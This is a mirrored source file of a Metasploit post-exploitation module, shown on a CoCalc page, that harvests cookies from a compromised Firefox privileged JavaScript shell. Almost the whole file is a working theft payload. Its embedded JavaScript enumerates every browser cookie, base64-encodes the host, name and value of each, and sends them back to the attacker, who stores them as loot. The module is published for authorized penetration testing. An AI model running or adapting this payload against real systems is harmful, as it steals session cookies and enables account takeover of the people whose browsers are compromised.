CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/firefox/gather/cookies.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'json'

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Firefox Gather Cookies from Privileged Javascript Shell',

16
        'Description' => %q{

17
          This module allows collection of cookies from a Firefox Privileged Javascript Shell.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [ 'joev' ],

21
        'DisclosureDate' => '2014-03-26'

22
      )

23
    )

24


25
    register_options([

26
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])

27
    ])

28
  end

29


30
  def run

31
    results = js_exec(js_payload)

32
    if results.present?

33
      begin

34
        cookies = JSON.parse(results)

35
        cookies.each do |entry|

36
          entry.each_key { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }

37
        end

38


39
        file = store_loot('firefox.cookies.json', 'text/json', rhost, results)

40
        print_good("Saved #{cookies.length} cookies to #{file}")

41
      rescue JSON::ParserError => e

42
        print_warning(results)

43
      end

44
    end

45
  end

46


47
  def js_payload

48
    %|

49
      (function(send){

50
        try {

51
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;

52
          var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]

53
                        .getService(Components.interfaces.nsICookieManager);

54
          var cookies = [];

55
          var iter = cookieManager.enumerator;

56
          while (iter.hasMoreElements()){

57
            var cookie = iter.getNext();

58
            if (cookie instanceof Components.interfaces.nsICookie){

59
              cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)})

60
            }

61
          }

62
          send(JSON.stringify(cookies));

63
        } catch (e) {

64
          send(e);

65
        }

66
      })(this.send);

67
    |.strip

68
  end

69
end

70


71